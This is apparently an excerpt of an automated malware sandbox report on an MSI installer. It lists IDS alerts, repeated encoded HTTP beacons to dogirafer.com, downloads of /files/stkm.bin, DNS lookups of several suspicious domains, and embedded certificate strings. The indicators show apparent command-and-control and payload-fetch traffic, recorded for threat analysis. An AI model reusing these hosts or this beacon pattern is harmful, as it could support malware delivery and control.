Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49886 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 104.21.68.89:443

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzXdZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 360Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12228Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0311900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

9_2_0311900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: vutarf.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 92Cache-Control: no-cache

Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
